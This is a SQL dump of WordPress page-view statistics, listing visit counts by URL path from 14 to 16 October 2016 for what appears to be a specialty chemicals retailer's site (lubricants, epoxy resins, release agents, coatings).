INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/sds/', '2016-10-14', 25, 1842); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/sds/?wc-ajax=get_refreshed_fragments', '2016-10-14', 3, 1842); 
INSERT INTO `wp_statistics_pages` VALUES ('/specialty-products-solvents/', '2016-10-14', 15, 1871); 
INSERT INTO `wp_statistics_pages` VALUES ('/articles/', '2016-10-14', 16, 664); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-faq/', '2016-10-14', 2, 2277); 
INSERT INTO `wp_statistics_pages` VALUES ('/vazo-free-radical-initiator/', '2016-10-14', 1, 1601); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dental-lubricant/', '2016-10-14', 1, 474); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/semi-permanent-mold-release-agents/', '2016-10-14', 1, 310); 
INSERT INTO `wp_statistics_pages` VALUES ('/mold-release-agents/', '2016-10-14', 1, 1525); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-555557/', '2016-10-14', 1, 1384); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-725727/', '2016-10-14', 1, 1697); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-738/', '2016-10-14', 3, 1840); 
INSERT INTO `wp_statistics_pages` VALUES ('/sds-access-request-form', '2016-10-14', 1, 2046); 
INSERT INTO `wp_statistics_pages` VALUES ('/sds-access-request-form/', '2016-10-14', 1, 2046); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact/', '2016-10-14', 20, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-538/', '2016-10-14', 1, 1836); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-580582/', '2016-10-14', 1, 1705); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/', '2016-10-14', 18, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/epoxy-resin-conformal-coatings/', '2016-10-14', 3, 1295); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-faq/?wc-ajax=get_refreshed_fragments', '2016-10-14', 1, 2277); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-mold-release-agent/', '2016-10-14', 10, 306); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products/?wc-ajax=get_refreshed_fragments', '2016-10-14', 8, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/plastic-glass-metal-cleaner/', '2016-10-14', 20, 1338); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-755l/', '2016-10-14', 1, 1690); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/silicone-conformal-coatings/', '2016-10-14', 2, 620); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-907-two-part-epoxy-adhesive/', '2016-10-14', 3, 1149); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-907-two-part-epoxy-adhesive/?wc-ajax=get_refreshed_fragments', '2016-10-14', 2, 1149); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-381hc/', '2016-10-14', 2, 1668); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/aeroduster-ms-222n/', '2016-10-14', 2, 489); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/conductive-coating/', '2016-10-14', 1, 1722); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-ptfe-release-agent/', '2016-10-14', 3, 1677); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-release-agent/', '2016-10-14', 3, 182); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-122xd/', '2016-10-14', 1, 1681); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-release-agent/', '2016-10-14', 1, 400); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/mold-release-agent/', '2016-10-14', 2, 423); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/semi-permanent-mold-release-agents-2/', '2016-10-14', 3, 425); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-w/', '2016-10-14', 3, 1059); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-w/?wc-ajax=get_refreshed_fragments', '2016-10-14', 2, 1059); 
INSERT INTO `wp_statistics_pages` VALUES ('/specialty-products-solvents/?wc-ajax=get_refreshed_fragments', '2016-10-14', 1, 1871); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-825/', '2016-10-14', 1, 842); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-825/?wc-ajax=get_refreshed_fragments', '2016-10-14', 1, 842); 
INSERT INTO `wp_statistics_pages` VALUES ('/about/', '2016-10-14', 19, 204); 
INSERT INTO `wp_statistics_pages` VALUES ('/about/?wc-ajax=get_refreshed_fragments', '2016-10-14', 2, 204); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/?wc-ajax=get_refreshed_fragments', '2016-10-14', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/news', '2016-10-14', 2, 118); 
INSERT INTO `wp_statistics_pages` VALUES ('/news/', '2016-10-14', 12, 118); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3046/', '2016-10-14', 1, 1166); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/', '2016-10-14', 12, 122); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-1a0/', '2016-10-14', 3, 992); 
INSERT INTO `wp_statistics_pages` VALUES ('/thank-you-for-your-inquiry', '2016-10-14', 1, 2526); 
INSERT INTO `wp_statistics_pages` VALUES ('/thank-you-for-your-inquiry/', '2016-10-14', 3, 2526); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-bdx/', '2016-10-14', 2, 697); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-103/', '2016-10-14', 2, 438); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-103/?wc-ajax=get_refreshed_fragments', '2016-10-14', 2, 438); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/plastic-glass-metal-cleaner/?wc-ajax=get_refreshed_fragments', '2016-10-14', 7, 1338); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-826/', '2016-10-14', 1, 861); 
INSERT INTO `wp_statistics_pages` VALUES ('/opteon-sion-specialty-solvent/', '2016-10-14', 1, 2618); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-xht-takes-heat/', '2016-10-14', 2, 2375); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-xht-takes-heat/?wc-ajax=get_refreshed_fragments', '2016-10-14', 1, 2375); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/milsolv-medical-solvents/', '2016-10-14', 1, 473); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-252n/', '2016-10-14', 1, 622); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-252n/?wc-ajax=get_refreshed_fragments', '2016-10-14', 1, 622); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-tm7-tire-mold-industry/', '2016-10-14', 1, 1113); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-tm7-tire-mold-industry/?wc-ajax=get_refreshed_fragments', '2016-10-14', 1, 1113); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-nrt-plss/', '2016-10-14', 1, 888); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-agl-683-gearbox-grease/', '2016-10-14', 2, 2311); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-agl-683-gearbox-grease/?wc-ajax=get_refreshed_fragments', '2016-10-14', 2, 2311); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-valve-lubricants/', '2016-10-14', 1, 2305); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-valve-lubricants/?wc-ajax=get_refreshed_fragments', '2016-10-14', 1, 2305); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-aviation/', '2016-10-14', 1, 2302); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-aviation/?wc-ajax=get_refreshed_fragments', '2016-10-14', 1, 2302); 
INSERT INTO `wp_statistics_pages` VALUES ('/opteon-sion-vapor-degreasing-solvent/', '2016-10-14', 3, 1135); 
INSERT INTO `wp_statistics_pages` VALUES ('/opteon-sion-vapor-degreasing-solvent/?wc-ajax=get_refreshed_fragments', '2016-10-14', 1, 1135); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/acrylic-conformal-coatings/', '2016-10-14', 2, 621); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/acrylic-conformal-coatings/?wc-ajax=get_refreshed_fragments', '2016-10-14', 2, 621); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive/', '2016-10-14', 2, 2381); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive/?wc-ajax=get_refreshed_fragments', '2016-10-14', 2, 2381); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-oxygen-pump-lubricant/', '2016-10-14', 1, 2410); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-oxygen-pump-lubricant/?wc-ajax=get_refreshed_fragments', '2016-10-14', 1, 2410); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epoxy-stripping-agent/', '2016-10-14', 1, 1152); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epoxy-stripping-agent/?wc-ajax=get_refreshed_fragments', '2016-10-14', 1, 1152); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsl/', '2016-10-14', 4, 960); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsl/?wc-ajax=get_refreshed_fragments', '2016-10-14', 4, 960); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/', '2016-10-14', 5, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/?wc-ajax=get_refreshed_fragments', '2016-10-14', 3, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-mold-release-agent/?wc-ajax=get_refreshed_fragments', '2016-10-14', 1, 306); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-828/', '2016-10-14', 5, 877); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-828/?wc-ajax=get_refreshed_fragments', '2016-10-14', 4, 877); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/quik-freeze-ms-242n/', '2016-10-14', 1, 1719); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-8280/', '2016-10-14', 3, 891); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/acrylic-conformal-coating-mil-spec/', '2016-10-14', 1, 637); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-200/', '2016-10-14', 1, 347); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-907-two-part-epoxy-adhesive/ms-907/', '2016-10-14', 1, 1150); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-mold-release-agent/', '2016-10-14', 4, 302); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-8280/?wc-ajax=get_refreshed_fragments', '2016-10-14', 2, 891); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-221/', '2016-10-14', 1, 843); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-release-agents/', '2016-10-14', 1, 2312); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/h0805ab/', '2016-10-14', 1, 1693); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-106/?wc-ajax=get_refreshed_fragments', '2016-10-14', 4, 441); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-381hc/?wc-ajax=get_refreshed_fragments', '2016-10-14', 1, 1668); 
INSERT INTO `wp_statistics_pages` VALUES ('/vertrel-fluids/', '2016-10-14', 3, 1121); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-830/', '2016-10-14', 1, 882); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-1a6/', '2016-10-14', 1, 999); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/xp-1a6/?wc-ajax=get_refreshed_fragments', '2016-10-14', 1, 999); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-106/', '2016-10-14', 3, 441); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/157-fsh/', '2016-10-14', 1, 956); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/silicone-electronic-coating/', '2016-10-14', 2, 732); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/pfpe-re-move-ms-250252/', '2016-10-14', 1, 1711); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-s/', '2016-10-14', 1, 659); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon/', '2016-10-14', 1, 490); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-xht-bdx/?wc-ajax=get_refreshed_fragments', '2016-10-14', 2, 697); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-720722/', '2016-10-14', 3, 1706); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-h-1-food-grade-lubricants/', '2016-10-14', 1, 2442); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-h-1-food-grade-lubricants/?wc-ajax=get_refreshed_fragments', '2016-10-14', 1, 2442); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-vpf-1525/', '2016-10-14', 1, 954); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-vpf-1525/?wc-ajax=get_refreshed_fragments', '2016-10-14', 1, 954); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vertrel-mca/', '2016-10-14', 1, 1263); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact/?wc-ajax=get_refreshed_fragments', '2016-10-14', 1, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-216/', '2016-10-14', 2, 823); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-216/?wc-ajax=get_refreshed_fragments', '2016-10-14', 1, 823); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-815c/', '2016-10-14', 1, 910); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-815c/?wc-ajax=get_refreshed_fragments', '2016-10-14', 1, 910); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-206/', '2016-10-14', 3, 790); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-223/', '2016-10-14', 1, 844); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-283az/?wc-ajax=get_refreshed_fragments', '2016-10-14', 1, 652); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-104/', '2016-10-14', 1, 439); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-104/?wc-ajax=get_refreshed_fragments', '2016-10-14', 1, 439); 
INSERT INTO `wp_statistics_pages` VALUES ('/dental-handpiece-lubricant/', '2016-10-14', 1, 1128); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/silicone-electronic-coating/?wc-ajax=get_refreshed_fragments', '2016-10-14', 1, 732); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/conformal-coating-stripper/', '2016-10-14', 2, 623); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/milglide-compounding-additives/', '2016-10-14', 1, 467); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/teflon-multi-use/', '2016-10-14', 1, 1801); 
INSERT INTO `wp_statistics_pages` VALUES ('/about', '2016-10-14', 1, 204); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-mold-release-agents/', '2016-10-14', 1, 303); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-ts4-thread-sealant/', '2016-10-14', 2, 989); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-ts4-thread-sealant/?wc-ajax=get_refreshed_fragments', '2016-10-14', 1, 989); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-mold-release-agent/?wc-ajax=get_refreshed_fragments', '2016-10-14', 1, 302); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-aut-2045/', '2016-10-14', 1, 713); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-217/', '2016-10-14', 1, 824); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-lube-for-life/', '2016-10-14', 1, 1117); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/fluoropolymer-medical-coatings/', '2016-10-14', 1, 469); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/fluoropolymer-medical-coatings/?wc-ajax=get_refreshed_fragments', '2016-10-14', 1, 469); 
INSERT INTO `wp_statistics_pages` VALUES ('/articles/?wc-ajax=get_refreshed_fragments', '2016-10-14', 1, 664); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vertrel-sdg/', '2016-10-14', 1, 1268); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-8132/', '2016-10-14', 1, 912); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3274/', '2016-10-14', 1, 1191); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-205/', '2016-10-14', 1, 789); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-205/?wc-ajax=get_refreshed_fragments', '2016-10-14', 1, 789); 
INSERT INTO `wp_statistics_pages` VALUES ('/articles/', '2016-10-15', 11, 664); 
INSERT INTO `wp_statistics_pages` VALUES ('/', '2016-10-15', 317, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/?wc-ajax=get_refreshed_fragments', '2016-10-15', 74, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/conformal-coating/', '2016-10-15', 3, 2474); 
INSERT INTO `wp_statistics_pages` VALUES ('/conformal-coating/?wc-ajax=get_refreshed_fragments', '2016-10-15', 2, 2474); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-52-radical-initiator/', '2016-10-15', 1, 568); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-52-radical-initiator/?wc-ajax=get_refreshed_fragments', '2016-10-15', 1, 568); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-ts4-thread-sealant/', '2016-10-15', 1, 2056); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/', '2016-10-15', 9, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/mold-release-agents/', '2016-10-15', 7, 1525); 
INSERT INTO `wp_statistics_pages` VALUES ('/mold-release-agents/?wc-ajax=get_refreshed_fragments', '2016-10-15', 3, 1525); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products/', '2016-10-15', 21, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/about/', '2016-10-15', 16, 204); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact/', '2016-10-15', 18, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/', '2016-10-15', 16, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/news/', '2016-10-15', 9, 118); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/sds/', '2016-10-15', 10, 1842); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/', '2016-10-15', 8, 122); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vertrel-xf/', '2016-10-15', 2, 1278); 
INSERT INTO `wp_statistics_pages` VALUES ('/thank-you-for-your-inquiry/', '2016-10-15', 2, 2526); 
INSERT INTO `wp_statistics_pages` VALUES ('/specialty-products-solvents/', '2016-10-15', 2, 1871); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/?wc-ajax=get_refreshed_fragments', '2016-10-15', 8, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/terms-conditions/', '2016-10-15', 2, 2150); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/sion/', '2016-10-15', 1, 1287); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/sion/?wc-ajax=get_refreshed_fragments', '2016-10-15', 1, 1287); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-mold-release-agent/', '2016-10-15', 9, 306); 
INSERT INTO `wp_statistics_pages` VALUES ('/mil-prf-27617-greases/', '2016-10-15', 2, 2552); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dental-lubricant/', '2016-10-15', 1, 474); 
INSERT INTO `wp_statistics_pages` VALUES ('/?cachebuster=1763378785', '2016-10-15', 2, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ms-153bn/', '2016-10-15', 1, 308); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3234/', '2016-10-15', 1, 1185); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epoxy-stripping-agent/', '2016-10-15', 3, 1152); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epoxy-stripping-agent/?wc-ajax=get_refreshed_fragments', '2016-10-15', 2, 1152); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3164/', '2016-10-15', 1, 1181); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3223/', '2016-10-15', 1, 1183); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3223/?wc-ajax=get_refreshed_fragments', '2016-10-15', 1, 1183); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/ptfe-release-agent/', '2016-10-15', 2, 182); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/plastic-glass-metal-cleaner/', '2016-10-15', 7, 1338); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact', '2016-10-15', 2, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-815c/', '2016-10-15', 1, 910); 
INSERT INTO `wp_statistics_pages` VALUES ('/mil-prf-27617-greases/shutterstock_405633937/', '2016-10-15', 2, 2553); 
INSERT INTO `wp_statistics_pages` VALUES ('/mil-prf-27617-greases/shutterstock_405633937/?wc-ajax=get_refreshed_fragments', '2016-10-15', 2, 2553); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/dry-film-mold-release-agent/?wc-ajax=get_refreshed_fragments', '2016-10-15', 1, 306); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-828/?wc-ajax=get_refreshed_fragments', '2016-10-15', 2, 877); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3290/', '2016-10-15', 1, 1198); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3290/?wc-ajax=get_refreshed_fragments', '2016-10-15', 1, 1198); 
INSERT INTO `wp_statistics_pages` VALUES ('/news', '2016-10-15', 2, 118); 
INSERT INTO `wp_statistics_pages` VALUES ('/about', '2016-10-15', 1, 204); 
INSERT INTO `wp_statistics_pages` VALUES ('/terms-conditions', '2016-10-15', 1, 2150); 
INSERT INTO `wp_statistics_pages` VALUES ('/vertrel-fluids/', '2016-10-15', 1, 1121); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/milglide-compounding-additives/', '2016-10-15', 1, 467); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/milglide-compounding-additives/?wc-ajax=get_refreshed_fragments', '2016-10-15', 1, 467); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-prepare-bearings/', '2016-10-15', 1, 2507); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-agl-683-gearbox-grease/', '2016-10-15', 1, 2311); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/opteon-suprion/liquid-viscosity-opteon-suprion/', '2016-10-15', 1, 2623); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/opteon-suprion/liquid-viscosity-opteon-suprion/?wc-ajax=get_refreshed_fragments', '2016-10-15', 1, 2623); 
INSERT INTO `wp_statistics_pages` VALUES ('/solvsys/', '2016-10-15', 1, 1248); 
INSERT INTO `wp_statistics_pages` VALUES ('/solvsys/?wc-ajax=get_refreshed_fragments', '2016-10-15', 1, 1248); 
INSERT INTO `wp_statistics_pages` VALUES ('/vazo-free-radical-initiator/', '2016-10-15', 2, 1601); 
INSERT INTO `wp_statistics_pages` VALUES ('/vazo-free-radical-initiator/?wc-ajax=get_refreshed_fragments', '2016-10-15', 1, 1601); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/vazo-64-radical-initiator/vazo-64-aibn-new2/', '2016-10-15', 1, 1350); 
INSERT INTO `wp_statistics_pages` VALUES ('/epoxy-resin-conformal-coatings/', '2016-10-15', 3, 1295); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-226/', '2016-10-15', 1, 850); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/semi-permanent-mold-release-agents-2/', '2016-10-15', 1, 425); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account', '2016-10-15', 1, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-w/', '2016-10-15', 1, 1059); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-w/?wc-ajax=get_refreshed_fragments', '2016-10-15', 1, 1059); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/high-temperature-release-agent/', '2016-10-15', 2, 308); 
INSERT INTO `wp_statistics_pages` VALUES ('/releasys-release-agent/', '2016-10-15', 1, 455); 
INSERT INTO `wp_statistics_pages` VALUES ('/about-miller-stephenson/', '2016-10-15', 4, 204); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products/?wc-ajax=get_refreshed_fragments', '2016-10-15', 1, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/quik-freeze-antistatic/', '2016-10-15', 1, 1726); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/quik-freeze-ms-242n/', '2016-10-15', 1, 1719); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epon-828/', '2016-10-15', 1, 877); 
INSERT INTO `wp_statistics_pages` VALUES ('/sds-access-request-form', '2016-10-15', 1, 2046); 
INSERT INTO `wp_statistics_pages` VALUES ('/sds-access-request-form/', '2016-10-15', 1, 2046); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-gpl-103/', '2016-10-15', 1, 438); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3140/', '2016-10-15', 1, 1868); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/epikure-3140/?wc-ajax=get_refreshed_fragments', '2016-10-15', 1, 1868); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-automotive-lubricants/', '2016-10-15', 1, 2390); 
INSERT INTO `wp_statistics_pages` VALUES ('/', '2016-10-16', 254, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/?wc-ajax=get_refreshed_fragments', '2016-10-16', 60, 64); 
INSERT INTO `wp_statistics_pages` VALUES ('/terms-conditions', '2016-10-16', 1, 2150); 
INSERT INTO `wp_statistics_pages` VALUES ('/terms-conditions/', '2016-10-16', 1, 2150); 
INSERT INTO `wp_statistics_pages` VALUES ('/mil-prf-27617-greases/', '2016-10-16', 2, 2552); 
INSERT INTO `wp_statistics_pages` VALUES ('/mil-prf-27617-greases/?wc-ajax=get_refreshed_fragments', '2016-10-16', 2, 2552); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products/', '2016-10-16', 27, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240aa/', '2016-10-16', 1, 642); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/krytox-240ab/', '2016-10-16', 1, 643); 
INSERT INTO `wp_statistics_pages` VALUES ('/mold-release-agents/?wc-ajax=get_refreshed_fragments', '2016-10-16', 2, 1525); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/sds/', '2016-10-16', 5, 1842); 
INSERT INTO `wp_statistics_pages` VALUES ('/contact/', '2016-10-16', 13, 120); 
INSERT INTO `wp_statistics_pages` VALUES ('/about-miller-stephenson/', '2016-10-16', 14, 204); 
INSERT INTO `wp_statistics_pages` VALUES ('/epoxy-resin-conformal-coatings/', '2016-10-16', 9, 1295); 
INSERT INTO `wp_statistics_pages` VALUES ('/articles/', '2016-10-16', 5, 664); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-tm7-tire-mold-industry/', '2016-10-16', 1, 1113); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox-aviation/', '2016-10-16', 3, 2302); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/composite-mold-release-agent/', '2016-10-16', 1, 290); 
INSERT INTO `wp_statistics_pages` VALUES ('/mold-release-agents/', '2016-10-16', 4, 1525); 
INSERT INTO `wp_statistics_pages` VALUES ('/about-miller-stephenson', '2016-10-16', 3, 204); 
INSERT INTO `wp_statistics_pages` VALUES ('/news/', '2016-10-16', 6, 118); 
INSERT INTO `wp_statistics_pages` VALUES ('/opteon-sion-vapor-degreasing-solvent/', '2016-10-16', 2, 1135); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account', '2016-10-16', 2, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/specialty-products-solvents/', '2016-10-16', 4, 1871); 
INSERT INTO `wp_statistics_pages` VALUES ('/tech-support/', '2016-10-16', 2, 122); 
INSERT INTO `wp_statistics_pages` VALUES ('/my-account/', '2016-10-16', 9, 22); 
INSERT INTO `wp_statistics_pages` VALUES ('/releasys-release-agent/', '2016-10-16', 3, 455); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/', '2016-10-16', 5, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/krytox/?wc-ajax=get_refreshed_fragments', '2016-10-16', 4, 2050); 
INSERT INTO `wp_statistics_pages` VALUES ('/chemical-products', '2016-10-16', 2, 116); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/acrylic-conformal-coating-mil-spec/', '2016-10-16', 1, 637); 
INSERT INTO `wp_statistics_pages` VALUES ('/product/acrylic-conformal-coating-mil-spec/?wc-ajax=get_refreshed_fragments', '2016-10-16', 1, 637); 
